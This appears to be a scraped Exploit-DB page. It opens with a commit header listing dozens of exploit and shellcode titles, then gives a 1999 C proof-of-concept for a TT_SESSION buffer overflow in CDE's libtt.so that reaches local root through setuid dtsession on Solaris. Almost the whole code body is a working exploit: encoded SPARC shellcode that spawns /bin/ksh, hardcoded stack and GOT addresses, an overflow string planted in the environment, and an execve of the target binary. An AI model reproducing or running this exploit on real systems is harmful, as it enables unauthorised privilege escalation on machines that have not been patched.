880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
159 lines
No EOL
5 KiB
C
159 lines
No EOL
5 KiB
C
/*
|
|
source: https://www.securityfocus.com/bid/641/info
|
|
|
|
TRU64/DIGITAL UNIX 4.0 d/f,AIX <= 4.3.2,Common Desktop Environment <= 2.1 20, IRIX <= 6.5.14,Solaris <= 7.0,SunOS <= 4.1.4 TTSession Buffer Overflow Vulnerability
|
|
|
|
The libtt.so shared library under certain versions of CDE handles a user defined variable titled TT_SESSION. The code which handles this variable does not place a restriction on its size. At least one of the CDE programs which rely on this variable do not have sufficient bounds checking in place for this variable. This can result in a buffer overflow. The program in question is dtsession.
|
|
|
|
Due to the fact that dtsession is running setuid root and does not remove the root privilege (at least as tested on Solaris), the overflow can lead to local root compromise.
|
|
*/
|
|
|
|
/*
|
|
* ovsession.c
|
|
* Job de Haas
|
|
* (C) ITSX BV 1999
|
|
*
|
|
* Some proof of concept code (== really ugly, barely working) at exploiting
|
|
* an overflow in libtt.so when parsing the TT_SESSION string.
|
|
* Only tested on a Solaris 2.6 sun4c sparc, with and without patch 105802-07
|
|
* based loosly on code by horizon <jmcdonal@unf.edu>
|
|
* Somehow the overflow is very sensitive to caching of the stack. To see that
|
|
* it really does work, run it in a debugger and set a break point in tt_open()
|
|
* when that is reached, set a breakpoint in sscanf and continue. When that is
|
|
* reached continue again and it will either crash or execute a shell.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <sys/types.h>
|
|
#include <sys/systeminfo.h>
|
|
#include <unistd.h>
|
|
#include <string.h>
|
|
|
|
#define BUF_LEN 280
|
|
|
|
char exploit[] =
|
|
"\220\33\100\15\202\20\40\27\221\323\100\15\220\33\100\17\
|
|
\220\2\40\10\320\43\277\370\224\2\40\11\332\52\277\377\
|
|
\332\43\277\374\220\33\140\1\202\20\40\6\221\323\100\15\
|
|
\220\33\100\15\202\20\40\51\221\323\100\15\320\3\277\370\
|
|
\222\43\240\10\224\43\240\4\202\20\40\73\221\323\100\15\
|
|
\232\33\100\15\232\33\100\15\232\33\100\15\232\33\100\15\
|
|
\232\33\100\15\232\33\100\15\232\33\100\15\232\33\100\15\
|
|
\177\377\377\344\232\33\100\15\57\142\151\156\57\153\163\150QQQ";
|
|
|
|
#if patched
|
|
#define got 0xef6d2be0
|
|
#else
|
|
#define got 0xef6d2f84
|
|
#endif
|
|
|
|
main()
|
|
{
|
|
char *argp[6], *envp[20];
|
|
char buf[3072];
|
|
char *ttsess;
|
|
char *display;
|
|
u_long *longp;
|
|
char data[512];
|
|
char padding[64];
|
|
char platform[256];
|
|
int pad=31;
|
|
int i;
|
|
|
|
memset(buf,0,3072);
|
|
memset(buf,'a',BUF_LEN);
|
|
|
|
longp = (unsigned long *)(buf+BUF_LEN);
|
|
|
|
/* %l0 - %l7 */
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = 0xdeadcafe;
|
|
|
|
/* %i0 - %i7 */
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = 0xefffff94; /* make sure %i1 can be used */
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = got; /* also used before we get to the exploit */
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = 0xdeadcafe;
|
|
*longp++ = 0xefffffb0; /* frame with some necessary values */
|
|
*longp++ = 0xeffffdd0; /* return into the exploit code */
|
|
|
|
|
|
longp=(unsigned long *)data;
|
|
|
|
*longp++=0xdeadbeef;
|
|
*longp++=0xdeadbeef;
|
|
*longp++=0xdeadbeef;
|
|
*longp++=0xdeadbeef;
|
|
*longp++=0xdeadbeef;
|
|
*longp++=0xffffffff;
|
|
*longp++=0xdeadbeef;
|
|
*longp++=0;
|
|
*longp++=0xefffffb4;
|
|
*longp++=0x01;
|
|
*longp++=0xef6dc154;
|
|
*longp++=0xeffffd26;
|
|
*longp++=0x00;
|
|
|
|
argp[0] = strdup("/usr/dt/bin/dtsession");
|
|
argp[1] = NULL;
|
|
|
|
if (!getenv("DISPLAY")) {
|
|
printf("forgot to set DISPLAY\n");
|
|
exit(1);
|
|
}
|
|
|
|
sysinfo(SI_PLATFORM,platform,256);
|
|
pad+=20-strlen(platform)-strlen(argp[0]);
|
|
|
|
for (i=0;i<pad;padding[i++]='C')
|
|
padding[i]=0;
|
|
|
|
/* create an enviroment size independent of the size of $DISPLAY */
|
|
display = malloc( 8 + strlen(getenv("DISPLAY")) + 1);
|
|
strcpy(display,"DISPLAY=");
|
|
strcat(display+8,getenv("DISPLAY"));
|
|
envp[0] = display;
|
|
envp[1] = malloc(60);
|
|
memset(envp[1], 0, 60);
|
|
memset(envp[1], 'a', 60 - strlen(envp[0]));
|
|
strncpy(envp[1],"W=",2);
|
|
|
|
/* put the exploit code in the env space (easy to locate) */
|
|
envp[2] = strdup(exploit);
|
|
|
|
/* create the overflow string */
|
|
ttsess = strdup("TT_SESSION=01 18176 1289637086 1 0 1000 %s 4");
|
|
envp[3] = malloc( strlen(ttsess) + strlen(buf));
|
|
sprintf(envp[3],ttsess,buf);
|
|
|
|
/* make it easier to debug, probably smarter ways to do this */
|
|
envp[4] = strdup("LD_BIND_NOW=1 ");
|
|
|
|
/* put some data in the environment to keep the code running after the
|
|
overflow, but before the return pointer is used. includes NULL ptrs */
|
|
envp[5]=(data);
|
|
envp[6]="";
|
|
envp[7]="";
|
|
envp[8]="";
|
|
envp[9]=&(data[32]);
|
|
envp[10]="";
|
|
envp[11]="";
|
|
envp[12]=&(data[39]);
|
|
envp[13]="";
|
|
envp[14]="";
|
|
envp[15]="\010";
|
|
envp[16]=padding;
|
|
envp[17]=NULL;
|
|
|
|
execve("/usr/dt/bin/dtsession",argp,envp);
|
|
|
|
} |